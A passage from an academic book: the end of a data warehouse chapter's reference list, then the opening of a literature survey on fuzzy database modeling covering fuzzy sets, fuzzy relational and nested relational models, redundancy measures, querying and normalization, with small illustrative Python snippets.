Golfarelli, M., & Rizzi, S. (2001, April 2-6). WAND: A CASE tool for data warehouse design. In Demo Proceedings of the International Conference on Data Engineering (pp. 7-9). Heidelberg, Germany. Gyssens, M., & Lakshmanan, L. V. S. (1997). A foundation for multi-dimensional databases. In Proceedings of the International Conference on Very Large Data Bases (pp. 106-115), Athens, Greece. Hüsemann, B., Lechtenbörger, J., & Vossen, G. (2000). Conceptual data warehouse design. In Proceedings of the International Workshop on Design and Management of Data Warehouses, Stockholm, Sweden. Jones, M. E., & Song, I. Y. (2005). Dimensional modeling: Identifying, classifying & applying patterns. In Proceedings of the ACM International Workshop on Data Warehousing and OLAP (pp. 29-38). Bremen, Germany. Kimball, R. (1996). The data warehouse toolkit. New York: John Wiley & Sons. Lechtenbörger , J. (2001). Data warehouse schema design (Tech. Rep. No. 79). DISDBIS Akademische Verlagsgesellschaft Aka GmbH, Germany. Lenz, H. J., & Shoshani, A. (1997). Summarizability in OLAP and statistical databases. In Proceedings of the 9th International Conference on Statistical and Scientific Database Management (pp. 132-143). Washington, DC. Li, C., & Wang, X. S. (1996). A data model for supporting on-line analytical processing. In Proceedings of the International Conference on Information and Knowledge Management (pp. 81-88). Rockville, Maryland. Luján-Mora, S., Trujillo, J., & Song, I. Y. (2002). Extending the UML for multidimensional modeling. In Proceedings of the International Con-
ference on the Unified Modeling Language (pp. 290-304). Dresden, Germany. Niemi, T., Nummenmaa, J., & Thanisch, P. (2001, June 4). Logical multidimensional database design for ragged and unbalanced aggregation. Proceedings of the 3rd International Workshop on Design and Management of Data Warehouses, Interlaken, Switzerland (p. 7). Nguyen, T. B., Tjoa, A. M., & Wagner, R. (2000). An object-oriented multidimensional data model for OLAP. In Proceedings of the International Conference on Web-Age Information Management (pp. 69-82). Shanghai, China. Pedersen, T. B., & Jensen, C. (1999). Multidimensional data modeling for complex data. In Proceedings of the International Conference on Data Engineering (pp. 336-345). Sydney, Austrialia. Prakash, N., & Gosain, A. (2003). Requirements driven data warehouse development. In Proceedings of the Conference on Advanced Information Systems Engineering—Short Papers, Klagenfurt/ Velden, Austria. Priebe, T., & Pernul, G. (2000). Towards OLAP security design: Survey and research issues. In Proceedings of the ACM International Workshop on Data Warehousing and OLAP (pp. 33-40). Washington, DC. SAP. (1998). Data modeling with BW. SAP America Inc. and SAP AG, Rockville, MD. Sapia, C., Blaschka, M., Hofling, G., & Dinter, B. (1998). Extending the E/R model for the multidimensional paradigm. In Proceedings of the International Conference on Conceptual Modeling, Singapore. Schiefer, J., List, B., & Bruckner, R. (2002). A holistic approach for managing requirements of data warehouse systems. In Proceedings of the Americas Conference on Information Systems.
Sen, A., & Sinha, A. P. (2005). A comparison of data warehousing methodologies. Communications of the ACM, 48(3), 79-84. Simitsis, A. (2005). Mapping conceptual to logical models for ETL processes. In Proceedings of the ACM International Workshop on Data Warehousing and OLAP (pp. 67-76). Bremen, Germany. Tryfona, N., Busborg, F., & Borch Christiansen, J. G. (1999). starER: A conceptual model for data warehouse design. In Proceedings of the ACM International Workshop on Data Warehousing and OLAP, Kansas City, Kansas (pp. 3-8). Tsois, A., Karayannidis, N., & Sellis, T. (2001). MAC: Conceptual data modeling for OLAP. In Proceedings of the International Workshop on Design and Management of Data Warehouses (pp. 5.1-5.11). Interlaken, Switzerland. Vassiliadis, P. (1998). Modeling multidimensional databases, cubes and cube operations. In Proceedings of the 10th International Conference on Statistical and Scientific Database Management, Capri, Italy.
Vassiliadis, P., Simitsis, A., & Skiadopoulos, S. (2002, November 8). Conceptual modeling for ETL processes. In Proceedings of the ACM International Workshop on Data Warehousing and OLAP (pp. 14-21). McLean, VA. Winter, R., & Strauch, B. (2003). A method for demand-driven information requirements analysis in data warehousing projects. In Proceedings of the Hawaii International Conference on System Sciences, Kona (pp. 1359-1365).
ENDNOTE

1. In this chapter we will only consider dynamicity at the instance level. Dynamicity at the schema level is related to the problem of evolution of DWs and is outside the scope of this chapter.
This work was previously published in Data Warehouses and OLAP: Concepts, Architectures and Solutions, edited by R. Wrembel and C. Koncilia, pp. 1-26, copyright 2007 by IRM Press (an imprint of IGI Global).
Chapter 1.7
A Literature Overview of Fuzzy Database Modeling Z. M. Ma Northeastern University, China
ABSTRACT

Fuzzy set theory has been extensively applied to extend various data models and has resulted in numerous contributions, mainly with respect to the popular relational model or to some related form of it. To satisfy the need of modeling complex objects with imprecision and uncertainty, much recent research has concentrated on fuzzy semantic (conceptual) and object-oriented data models. This chapter reviews fuzzy database modeling technologies, including fuzzy conceptual data models and database models. Concerning fuzzy database models, fuzzy relational databases, fuzzy nested relational databases, and fuzzy object-oriented databases are discussed, respectively.
INTRODUCTION

A major goal for database research has been the incorporation of additional semantics into the
data model. Classical data models often suffer from their incapability of representing and manipulating imprecise and uncertain information that may occur in many real-world applications. Since the early 1980s, Zadeh’s fuzzy logic (Zadeh, 1965) has been used to extend various data models. The purpose of introducing fuzzy logic in databases is to enhance the classical models such that uncertain and imprecise information can be represented and manipulated. This resulted in numerous contributions, mainly with respect to the popular relational model or to some related form of it. Also rapid advances in computing power have brought opportunities for databases in emerging applications in CAD/CAM, multimedia and geographic information systems (GIS). These applications characteristically require the modeling and manipulation of complex objects and semantic relationships. It has been proved that the object-oriented paradigm lends itself extremely well to the requirements. Since classical relational database model and its extension of fuzziness do
not satisfy the need of modeling complex objects with imprecision and uncertainty, much current research has concentrated on fuzzy object-oriented database models in order to deal with complex objects and uncertain data together. Database modeling can be carried out at two different levels: conceptual data modeling and database modeling. Therefore, we have conceptual data models (e.g., ER/EER and UML) and logical database models (relational databases, nested relational databases, and object-oriented databases). Logical database models are often created through mapping conceptual data models into logical database models. This conversion is called conceptual design of databases. Since fuzzy database approaches were first created in the late 1970s by several research groups, a significant body of research in the area of fuzzy database modeling has been developed over the past 30 years. Although there have been a lot of fuzzy database papers, one only finds a few comprehensive review papers of fuzzy database modeling (Yazici, Buckles, & Petry, 1992; Kerre & Chen, 1995). It has been nearly 10 years since the latest comprehensive overview paper appeared in this area (Kerre & Chen, 1995). This chapter aims to provide a literature overview of fuzzy database modeling to satisfy the obvious need for an update. The topics of the literature referred to in the chapter include fuzzy logical database modeling, fuzzy conceptual data modeling, and design and implementation of fuzzy databases. It should be noticed, however, that this does not mean that this chapter covers all publications in the research area and gives complete descriptions.

The remainder of this chapter is organized as follows. The second section gives the basic knowledge about imperfect information and fuzzy sets theory. Issues about fuzzy logical (relational, nested relational, object-oriented, and object-relational) database models are described in the third section. The fourth section investigates issues about fuzzy conceptual data (ER/EER, IFO, and UML) models. The fifth section discusses
issues about design and implementation of fuzzy databases, including the conceptual design, indexing techniques, and prototypes. The last section concludes this chapter.
IMPERFECT INFORMATION AND FUZZY SETS THEORY

Inconsistency, imprecision, vagueness, uncertainty, and ambiguity are identified as five basic kinds of imperfect information in database systems in Bosc and Prade (1993). Inconsistency is a kind of semantic conflict, meaning the same aspect of the real world is irreconcilably represented more than once in a database or in several different databases. Information inconsistency usually comes from information integration. Intuitively, imprecision and vagueness are relevant to the content of an attribute value, and they mean that a choice must be made from a given range (interval or set) of values but we do not know exactly which one to choose at present. In general, vague information is represented by linguistic values. Uncertainty is related to the degree of truth of an attribute value, and it means that we can apportion some, but not all, of our belief to a given value or a group of values. Random uncertainty, described using probability theory, is not considered in this chapter. Ambiguity means that some elements of the model lack complete semantics, leading to several possible interpretations. Generally, several different kinds of imperfection can co-exist with respect to the same piece of information. Imprecision, uncertainty, and vagueness are three major types of imperfect information. Vagueness and uncertainty can be modeled with possibility theory (Zadeh, 1978). Many of the existing approaches dealing with imprecision and uncertainty are based on the theory of fuzzy sets (Zadeh, 1965).

Smets (1997) presents some aspects of imperfection, in which imprecision, inconsistency, and uncertainty are the major groups. Imprecision
and inconsistency are properties related to the content of the statement: either more than one world or no world is compatible with the available information, respectively. Uncertainty is a property that results from a lack of information about the world for deciding if the statement is true or false. Imprecision and inconsistency are essentially properties of the information itself whereas uncertainty is a property of the relation between the information and our knowledge about the world. To model imprecision and uncertainty, the various approaches are presented in (Smets, 1997). These models are grouped into two large categories, namely, the symbolic and the quantitative models. Fuzzy sets introduced by Zadeh (1965) have been widely used for the quantification of imprecision. Fuzzy data was originally described as a fuzzy set by Zadeh (1965). Let U be a universe of discourse. A fuzzy value on U is characterized by a fuzzy set F in U. A membership function:
μF: U → [0, 1]

is defined for the fuzzy set F, where μF (u), for each u ∈ U, denotes the degree of membership of u in the fuzzy set F. Thus the fuzzy set F is described as follows:

F = {μF (u1)/u1, μF (u2)/u2, ..., μF (un)/un}

When U is an infinite set, then the fuzzy set F can be represented by:

F = ∫u ∈ U μF (u)/u

When the membership function μF (u) above is explained to be a measure of the possibility that a variable X has the value u, where X takes values in U, a fuzzy value is described by a possibility distribution πX (Zadeh, 1978).

πX = {πX (u1)/u1, πX (u2)/u2, ..., πX (un)/un}

Here, πX (ui), ui ∈ U denotes the possibility that ui is true. Let πX and F be the possibility distribution representation and the fuzzy set representation for a fuzzy value, respectively.

Let A and B be fuzzy sets in the same universe of discourse U with the membership functions μA and μB, respectively. Then we have the following:

• Union: The union of fuzzy sets A and B, denoted A ∪ B, is a fuzzy set on U with the membership function μA ∪ B: U → [0, 1], where: ∀u ∈ U, μA ∪ B (u) = max (μA (u), μB (u)).
• Intersection: The intersection of fuzzy sets A and B, denoted A ∩ B, is a fuzzy set on U with the membership function μA ∩ B: U → [0, 1], where: ∀u ∈ U, μA ∩ B (u) = min (μA (u), μB (u)).
• Complementation: The complementation of fuzzy set A, denoted by Ā, is a fuzzy set on U with the membership function μĀ: U → [0, 1], where: ∀u ∈ U, μĀ (u) = 1 − μA (u).

Definition. A fuzzy set F of the universe of discourse U is convex if and only if for all u1, u2 in U: μF (λu1 + (1 − λ) u2) ≥ min (μF (u1), μF (u2)), where λ ∈ [0, 1].

Definition. A fuzzy set F of the universe of discourse U is called a normal fuzzy set if ∃ u ∈ U, μF (u) = 1.
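As a minimal Python illustration of the definitions above (a discrete universe with invented membership values), union, intersection, and complementation can be computed pointwise, and normality checked directly:

U = ["u1", "u2", "u3"]
A = {"u1": 0.2, "u2": 1.0, "u3": 0.5}   # μA
B = {"u1": 0.7, "u2": 0.4, "u3": 0.5}   # μB

union        = {u: max(A[u], B[u]) for u in U}     # μA∪B(u) = max(μA(u), μB(u))
intersection = {u: min(A[u], B[u]) for u in U}     # μA∩B(u) = min(μA(u), μB(u))
complement_A = {u: 1 - A[u] for u in U}            # μĀ(u) = 1 − μA(u)
is_normal    = any(m == 1.0 for m in A.values())   # ∃u: μA(u) = 1

print(union, intersection, complement_A, is_normal)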
Definition. A fuzzy number is a fuzzy subset in the universe of discourse U that is both convex and normal.

Now several notions related to fuzzy numbers are discussed. Let U be a universe of discourse and F a fuzzy number in U with the membership function μF: U → [0, 1]. We have then the following notions:

• Support: The set of elements that have nonzero degrees of membership in F is called the support of F, denoted by:

supp (F) = {u| u ∈ U and μF (u) > 0}.

• Kernel: The set of elements that completely belong to F is called the kernel of F, denoted by:

ker (F) = {u| u ∈ U and μF (u) = 1}.

• α-cut: The set of elements whose degrees of membership in F are greater than (greater than or equal to) α, where 0 ≤ α < 1 (0 < α ≤ 1), is called the strong (weak) α-cut of F, respectively denoted by:

Fα+ = {u| u ∈ U and μF (u) > α} and Fα = {u| u ∈ U and μF (u) ≥ α}.

It is clear that the α-cut of a fuzzy number corresponds to an interval. Let A and B be the fuzzy numbers of the universe of discourse U and let Aα and Bα be the α-cuts of the fuzzy numbers A and B, respectively, where Aα = [x1, y1] and Bα = [x2, y2]. Then we have:

(A ∪ B)α = Aα ∪ Bα and (A ∩ B)α = Aα ∩ Bα,

where ∪ and ∩ denote the union operator and intersection operator between two intervals, respectively. The Aα ∪ Bα and Aα ∩ Bα are defined as follows:

Aα ∪ Bα = [x1, y1] or [x2, y2], if A ∩ B = Φ; [min (x1, x2), max (y1, y2)], if A ∩ B ≠ Φ

Aα ∩ Bα = Φ, if A ∩ B = Φ; [max (x1, x2), min (y1, y2)], if A ∩ B ≠ Φ

FUZZY LOGICAL DATABASE MODELS
Many database researchers have aimed their effort to extend different database models for the purpose of dealing with fuzzy data, and fuzzy database models have appeared as a result. Two major fuzzy logical database models can be found in literature, which are fuzzy relational databases and fuzzy object-oriented databases. In addition, few studies have been done in fuzzy nested relational databases and fuzzy object-relational databases.
Fuzzy Relational Databases

Fuzzy information has been extensively investigated in the context of the relational databases. For a comprehensive review of what has been done in the development of the fuzzy relational databases, please refer to Petry (1996); Chen (1999); Yazici and George (1999); Ma (2005a); and Yazici, Buckles, and Petry (1992). The following are some major issues in current studies of fuzzy relational databases.
Representations and Models

Several approaches have been taken to incorporate fuzzy data into the relational database model. One of the fuzzy relational data models is based on similarity relation (Buckles & Petry, 1982), or proximity relation (Shenoi & Melton, 1989), or resemblance (Rundensteiner, Hawkes, & Bandler, 1989). The other one is based on possibility distribution (Prade & Testemale, 1984; Raju & Majumdar, 1988), which can further be classified into two categories: tuples associated with possibilities and attribute values represented by possibility distributions (Raju & Majumdar, 1988). The form of an n-tuple in each of the above-mentioned fuzzy relational models can be expressed, respectively, as t = <p1, p2, ..., pn>, t = <a1, a2, ..., an, d>, and t = <πA1, πA2, ..., πAn>, where pi ⊆ Di with Di being the domain of attribute Ai, ai ∈ Di, d ∈ (0, 1], πAi is the possibility distribution of attribute Ai on its domain Di, and πAi (x), x ∈ Di, denotes the possibility that x is the actual value of t [Ai].

Based on the above-mentioned basic fuzzy relational models, there are several extended fuzzy relational database models. It is clear that one can combine two kinds of fuzziness in possibility-based fuzzy relational databases, where attribute values may be possibility distributions and tuples are connected with membership degrees. Such fuzzy relational databases are called possibility-distribution-fuzzy relational models in (Umano & Fukami, 1994). Another possible extension is to combine possibility distribution and similarity (proximity or resemblance) relation, and the extended possibility-based fuzzy relational databases are hereby proposed in (Chen, Vandenbulcke, & Kerre, 1992; Ma, Zhang, & Ma, 2000; Rundensteiner, Hawkes, & Bandler, 1989), where possibility distribution and resemblance relation arise in a relational database simultaneously.
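Purely as an illustration (Python, with invented attribute values; none of this syntax is prescribed by the models themselves), the three tuple forms can be written down as follows:

# Similarity-based model: each attribute value is a subset of its domain.
t_similarity = {"Name": {"Tom"}, "Age": {30, 31, 32}}

# Possibility-based model, first category: a crisp tuple with a membership degree d in (0, 1].
t_tuple_possibility = ({"Name": "Tom", "Age": 31}, 0.8)

# Possibility-based model, second category: attribute values are possibility distributions πAi.
t_distribution = {"Name": {"Tom": 1.0}, "Age": {30: 0.7, 31: 1.0, 32: 0.6}}

print(t_similarity, t_tuple_possibility, t_distribution)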
Definition. A fuzzy relation r on a relational schema R (A1, A2, ..., An) is a subset of the Cartesian product of Dom (A1) × Dom (A2) × ... × Dom (An), where Dom (Ai) may be a fuzzy subset or even a set of fuzzy subsets and there is a resemblance relation on the Dom (Ai). A resemblance relation Res on Dom (Ai) is a mapping, Dom (Ai) × Dom (Ai) → [0, 1], such that:

(1) for all x in Dom (Ai), Res (x, x) = 1 (reflexivity)
(2) for all x, y in Dom (Ai), Res (x, y) = Res (y, x) (symmetry)
Semantic Measures and Data Redundancies

To measure the semantic relationship between fuzzy data, some investigation results for assessing data redundancy can be found in the literature.

a. Rundensteiner, Hawkes, and Bandler in 1989 proposed the notion of nearness measure. Two fuzzy data πA and πB were considered α-β redundant if and only if the following inequality equations hold true:

min x, y ∈ supp (πA) ∪ supp (πB) (Res (x, y)) ≥ α and min z ∈ U (1 − |πA (z) − πB (z)|) ≥ β,

where α and β are the given thresholds, Res (x, y) denotes the resemblance relation on the attribute domain, and supp (πA) denotes the support of πA. It is clear that a twofold condition is applied in their study.

b. For two data πA and πB, Chen, Vandenbulcke, and Kerre (1992) define the following approach to assess the possibility and impossibility that πA = πB:

Ec (πA, πB) (T) = sup x, y ∈ U, c (x, y) ≥ α (min (πA (x), πB (y))) and
Ec (πA, πB) (F) = sup x, y ∈ U, c (x, y) < α (min (πA (x), πB (y)))

Here c (x, y) denotes a closeness relation (being the same as the resemblance relation).

c. In Cubero and Vila (1994), the notions of weak resemblance and strong resemblance are proposed for representing the possibility and the necessity that two fuzzy values πA and πB are approximately equal, respectively. Weak resemblance and strong resemblance can be expressed as follows:

Π (πA ≈ πB) = sup x, y ∈ U (min (Res (x, y), πA (x), πB (y))) and
N (πA ≈ πB) = inf x, y ∈ U (max (Res (x, y), 1 − πA (x), 1 − πB (y)))

The semantic measures were employed as a basis for a new definition of fuzzy functional dependencies in Cubero and Vila (1994).

d. Bosc and Pivert (1997) give the following function to measure the interchangeability that fuzzy value πA can be replaced with another fuzzy data πB, that is, the possibility that πA is close to πB from the left-hand side:

μrepl (πA, πB) = inf x ∈ supp (πA) (max (1 − πA (x), μS (πA, πB) (x))),

where μS (πA, πB) (x) is defined as:

μS (πA, πB) (x) = sup y ∈ supp (πB) (min (Res (x, y), 1 − |πA (x) − πB (y)|)).
It has been shown that counterintuitive results are produced with the treatment of (a) due to the fact that two criteria are set separately for redundancy evaluation (Chen, Vandenbulcke, & Kerre, 1992; Bosc & Pivert, 1997). Therefore the approaches of (b) and (d) tried to set two
criteria together for the redundancy evaluation. For the approach in (b), however, there also exist some inconsistencies in assessing the redundancy of fuzzy data represented by possibility distributions (Ma, Zhang, & Ma, 1999). The approach in (d) is actually an extension of the approach of (a), and the counterintuitive problem of (a) still exists in (d), as demonstrated in (Ma, Zhang, & Ma, 2000). As to the approach in (c), the weak resemblance appears to be too "optimistic" and the strong resemblance too severe for the semantic assessment of fuzzy data (Bosc & Pivert, 1997). Therefore, in Ma, Zhang, and Ma (2000), the notions of semantic inclusion degree and semantic equivalence degree are proposed. For two fuzzy data πA and πB, the semantic inclusion degree SID (πA, πB) denotes the degree to which πA semantically includes πB, and the semantic equivalence degree SED (πA, πB) denotes the degree to which πA and πB are equivalent to each other. Based on possibility distributions and a resemblance relation, the semantic inclusion degree and the semantic equivalence degree of two fuzzy data over the universe U = {u1, u2, ..., un} are calculated as follows:

SIDα (πA, πB) = Σ_{i=1}^{n} min_{u_i, u_j ∈ U and Res_U (u_i, u_j) ≥ α} (πB (u_i), πA (u_j)) / Σ_{i=1}^{n} πB (u_i)

and

SEDα (πA, πB) = min (SIDα (πA, πB), SIDα (πB, πA)).

The notion of the semantic inclusion (or equivalence) degree of attribute values can be extended to the semantic inclusion (or equivalence) degree of tuples. Let ti = <ti [A1], ti [A2], ..., ti [An]> and tj = <tj [A1], tj [A2], ..., tj [An]> be two tuples in a fuzzy relational instance r over schema R (A1, A2, ..., An). The semantic inclusion degree of tuples ti and tj is denoted:
SIDα (ti, tj) = min {SIDα (ti [A1], tj [A1]), SIDα (ti [A2], tj [A2]), ..., SIDα (ti [An], tj [An])}.

The semantic equivalence degree of tuples ti and tj is denoted:

SEDα (ti, tj) = min {SEDα (ti [A1], tj [A1]), SEDα (ti [A2], tj [A2]), ..., SEDα (ti [An], tj [An])}.

Two types of fuzzy data redundancy, inclusion redundancy and equivalence redundancy, can thus be distinguished and evaluated in fuzzy relational databases. Differently from classical set theory, due to data fuzziness the condition A = B is essentially a particular case of fuzzy data equivalence redundancy, and the condition A ⊇ B or A ⊆ B is essentially a particular case of fuzzy data inclusion redundancy. Here A and B are fuzzy sets. In general, thresholds should be considered when evaluating the semantic relationship between two fuzzy data. Let πA and πB as well as α be the same as above, and let β be a threshold. If SIDα (πA, πB) ≥ β, it is said that πB is inclusively redundant to πA. If SEDα (πA, πB) ≥ β, it is said that πA and πB are equivalently redundant to each other. It is clear that equivalence redundancy of fuzzy data is a particular case of inclusion redundancy of fuzzy data. Considering the effect of the resemblance relation in the evaluation of semantic inclusion and equivalence degrees, two fuzzy data πA and πB are considered equivalently α-β-redundant if and only if SEDα (πA, πB) ≥ β; if SIDα (πA, πB) ≥ β and SIDα (πB, πA) < β, then πB is inclusively α-β-redundant to πA. The processing of fuzzy value redundancy can be extended to that of fuzzy tuple redundancy. In a similar way, fuzzy tuple redundancy can be classified into inclusion redundancy and equivalence redundancy of tuples. Let r be a fuzzy relation on the relational schema R (A1, A2, ..., An), let t = (πA1, πA2, ..., πAn) and t' = (π'A1, π'A2, ..., π'An) be two tuples in r, and let α ∈ [0, 1] and β ∈ [0, 1] be two thresholds. The tuple t' is inclusively α-β-redundant to t if and only if min (SIDα (πAi, π'Ai)) ≥ β holds (1 ≤ i ≤ n). The tuples t and t' are equivalently α-β-redundant if and only if min (SEDα (πAi, π'Ai)) ≥ β holds (1 ≤ i ≤ n).
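To illustrate how these degrees can be computed, the following sketch implements one plausible reading of the SIDα and SEDα definitions above, in which each πB (u_i) is matched against the best πA (u_j) among the elements u_j that resemble u_i to degree at least α. The universe, distributions, resemblance table, and thresholds are invented for illustration, and the matching interpretation itself is an assumption rather than a verbatim transcription of Ma, Zhang, and Ma (2000).

# Illustrative sketch of semantic inclusion/equivalence degrees for two
# possibility distributions over a small finite universe.

U = ["u1", "u2", "u3"]

RES = {  # resemblance relation on U, symmetric; Res(u, u) = 1 is implicit
    ("u1", "u2"): 0.9, ("u2", "u1"): 0.9,
    ("u1", "u3"): 0.3, ("u3", "u1"): 0.3,
    ("u2", "u3"): 0.4, ("u3", "u2"): 0.4,
}

def res_u(x, y):
    return 1.0 if x == y else RES.get((x, y), 0.0)

def sid(pi_a, pi_b, alpha):
    """Degree to which pi_a semantically includes pi_b (threshold alpha)."""
    num = 0.0
    for ui in U:
        # match pi_b(ui) against the best pi_a(uj) with Res(ui, uj) >= alpha
        candidates = [min(pi_b.get(ui, 0.0), pi_a.get(uj, 0.0))
                      for uj in U if res_u(ui, uj) >= alpha]
        num += max(candidates, default=0.0)
    den = sum(pi_b.get(ui, 0.0) for ui in U)
    return num / den if den else 1.0

def sed(pi_a, pi_b, alpha):
    return min(sid(pi_a, pi_b, alpha), sid(pi_b, pi_a, alpha))

pi_a = {"u1": 1.0, "u2": 0.8}
pi_b = {"u1": 0.9, "u2": 0.7, "u3": 0.2}

alpha, beta = 0.8, 0.75
print(sid(pi_a, pi_b, alpha), sed(pi_a, pi_b, alpha))
# pi_b is inclusively alpha-beta-redundant to pi_a if SID >= beta:
print(sid(pi_a, pi_b, alpha) >= beta)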
Query and Data Processing

Classical relational databases suffer from a lack of flexibility in querying: the given selection condition and the contents of the relation are all crisp. A query is flexible if the following conditions can be satisfied (Bosc & Pivert, 1992):

• A qualitative distinction between the selected tuples is allowed.
• Imprecise conditions inside queries are introduced when the user cannot define his/her needs in a definite way, or when a prespecified number of responses is desired and therefore a margin is allowed to interpret the query.
Typically, the former case occurs when the queried relational databases contain incomplete information and the query conditions are crisp, and the latter case occurs when the query conditions are imprecise even if the queried relational databases do not contain incomplete information. In Zemankova and Kandel (1985), the fuzzy relational data base (FRDB) model architecture and query language are presented and the possible applications of the FRDB in imprecise information processing are discussed. In Kacprzyk, Zadrozny, and Ziokkowski (1987), a "human-consistent" database querying system based on fuzzy logic with linguistic quantifiers is presented. Using clustering techniques, Kamel, Hadfield, and Ismail (1990) present a fuzzy query processing method. Takahashi presents a fuzzy query language for relational databases (Takahashi, 1991) and discusses the theoretical
foundation of query languages for fuzzy databases in (Takahashi, 1993). Two fuzzy database query languages are proposed: a fuzzy calculus query language and a fuzzy algebra query language. In Bosc and Lietard (1996), the concepts of fuzzy integrals and database flexible querying are presented. In Bosc and Pivert (1995), a relational database language called SQLf for fuzzy querying is presented, in which selection, join, and projection operations are extended to cope with fuzzy conditions. Fuzzy query translation techniques for relational database systems and techniques of fuzzy query processing for fuzzy database systems are presented in (Chen & Jong, 1997) and (Chen & Chen, 2000), respectively. In addition, based on matching strengths of answers in fuzzy relational databases, Chiang, Lin, and Shis (1998) present a method for fuzzy query processing, and Yang et al. (2001) focus on nested fuzzy SQL queries in a fuzzy relational database. Fuzzy logic techniques have also been used in multimedia database querying (Dubois, Prade, & Sedes, 2001). In addition to query processing in fuzzy relational databases, there are also a few studies focusing on the operations of relational algebra in fuzzy relational databases (Umano & Fukami, 1994; Ma & Mili, 2002a). In Zhang and Wang (2000), a type of fuzzy equi-join is defined using fuzzy equality indicators.
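The following is a small sketch in the spirit of the flexible (SQLf-style) querying discussed above, rather than an implementation of any of the cited systems: a crisp relation is filtered by a fuzzy predicate and the answers are ranked by their satisfaction degree. The predicate, threshold, and data are invented for illustration.

def young(age):
    """Trapezoidal membership: fully young up to 25, not young from 35 on."""
    if age <= 25:
        return 1.0
    if age >= 35:
        return 0.0
    return (35 - age) / 10.0

employees = [
    {"name": "Ann", "age": 24},
    {"name": "Bob", "age": 31},
    {"name": "Eve", "age": 38},
]

# Roughly: SELECT name FROM employees WHERE age IS young (threshold 0.3),
# with answers ranked by satisfaction degree.
threshold = 0.3
answers = sorted(((young(e["age"]), e["name"]) for e in employees), reverse=True)
for degree, name in answers:
    if degree >= threshold:
        print(f"{name}: satisfaction degree {degree:.2f}")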
Data Dependencies and Normalization

Integrity constraints play a critical role in logical database design. Among these constraints, data dependencies are of particular interest. Based on various fuzzy relational database models, some attempts have been made to express data dependencies, mainly fuzzy functional dependency (FFD) and fuzzy multivalued dependency (FMVD). The papers that focus on FFD can be classified into two kinds: the first has a focus on the axiomatization of FFD
(Chen, Kerre, & Vandenbulcke, 1994; Cubero & Vila, 1994; Chen, Kerre, & Vandenbulcke, 1995; Saxena & Tyagi, 1995; Liao, Wang, & Liu, 1999; Liu, 1992, 1993a, 1993b) and the second has a focus on lossless join and decomposition (Raju & Majumdar, 1988; Bhuniya & Niyogi, 1993; Bosc & Pivert, 2003). The latter is the basis for implementing the normalization of fuzzy relational databases (Chen, Kerre, & Vandenbulcke, 1996). There are also some papers that focus on FMVD (Tripathy & Sakena, 1990; Jyothi & Babu, 1997; Bhattacharjee & Mazumdar, 1998). Finally, some papers focus on both FFD and FMVD and present the axiomatization of FFD and FMVD (Liu, 1997; Yazici & Sozat, 1998; Sözat & Yazici, 2001; Ma, Zhang, Ma, & Mili, 2002). To solve the problems of update anomalies and data redundancies that may exist in fuzzy relational databases, the normalization theory of the classical relational database model must be extended so as to provide theoretical guidelines for fuzzy relational database design. Based on the notion of fuzzy functional dependency, some notions such as relation keys and normal forms are generalized in Chen, Kerre, and Vandenbulcke (1996). As a result, q-keys, fuzzy first normal form (F1NF), q-fuzzy second normal form (q-F2NF), q-fuzzy third normal form (q-F3NF), and q-fuzzy Boyce-Codd normal form (q-FBCNF) are formulated. Dependency-preserving and lossless join decompositions into q-F3NFs are also discussed. Within the framework of the similarity-based fuzzy data representation, in Bahar and Yazici (2004), similarity, conformance of tuples, the concept of fuzzy functional dependencies, and partial fuzzy functional dependencies are discussed. On this basis, the fuzzy key notion, transitive closures, and the fuzzy normal forms are defined for similarity-based fuzzy relational databases, and algorithms for dependency-preserving and lossless join decompositions of fuzzy relations are given. It is also shown how normalization, dependency-preserving, and lossless join decomposition based on the fuzzy functional dependencies of a fuzzy relation are performed and applied to some real-life applications. By employing equivalence classes from domain partitions, the functional dependencies and normal forms for the fuzzy relational model are defined in Shenoi and Melton (1992), and the associated normalization issues are then discussed. It should be noticed that fuzzy data dependencies can be applied in data handling. In Bosc, Dubois, and Prade (1998), FFD is used for redundancy elimination. In Intan and Mukaidono (2000), FFD is used for approximate data querying. In Chang and Chen (1998), Liao, Wang, and Liu (1999), and Ma, Zhang, and Mili (2002), FFD is used for fuzzy data compression.
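As a rough illustration of how a fuzzy functional dependency can be checked in practice, the sketch below evaluates the degree to which an attribute X determines an attribute Y over a toy relation. The closeness table and the use of the Gödel implication are assumptions made here for illustration, since the surveyed definitions of FFD differ in exactly these choices.

def eq(a, b):
    """Closeness of two attribute values in [0, 1] (toy similarity table)."""
    table = {frozenset(["cheap", "low"]): 0.9,
             frozenset(["cheap", "high"]): 0.1,
             frozenset(["low", "high"]): 0.1}
    return 1.0 if a == b else table.get(frozenset([a, b]), 0.0)

def implies(p, q):
    """Godel implication: 1 if p <= q, else q."""
    return 1.0 if p <= q else q

def ffd_degree(rel, x, y):
    """Degree to which attribute x functionally determines attribute y in rel."""
    deg = 1.0
    for t1 in rel:
        for t2 in rel:
            deg = min(deg, implies(eq(t1[x], t2[x]), eq(t1[y], t2[y])))
    return deg

r = [{"price": "cheap", "quality": "low"},
     {"price": "low",   "quality": "low"},
     {"price": "high",  "quality": "high"}]

theta = 0.8
# Does price determine quality to degree at least theta?
print(ffd_degree(r, "price", "quality") >= theta)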
Fuzzy Nested Relational Databases

In Yazici, Buckles, and Petry (1999), an extended nested relational data model (also known as an NF2 data model) is introduced for representing and manipulating complex and uncertain data in databases, and an extended algebra and an extended SQL-like query language are hereby defined. Physical data representation of the model and the core operations that the model provides are also introduced. In Ma and Mili (2002b), based on possibility distributions rather than the similarity relations used in Yazici, Buckles, and Petry (1999), an extended possibility-based fuzzy nested relational database model is introduced and its algebra is hereby developed. It should be pointed out that the NF2 data model is able to handle complex-valued attributes and may be better suited to some complex applications such as office automation systems, information retrieval systems, and expert database systems. But it is difficult for the NF2 data model to represent complex relationships among objects and attributes. Some advanced abstractions in data modeling (e.g., class hierarchy, inheritance, superclass/subclass, and encapsulation), which are needed by many real applications, are not supported by the NF2 data model. Therefore, in order to model uncertain data and complex-valued attributes as well as complex relationships among objects, current efforts have been focused on conceptual data models and object-oriented databases (OODB) with imprecise and uncertain information.
Fuzzy Object-Oriented Databases

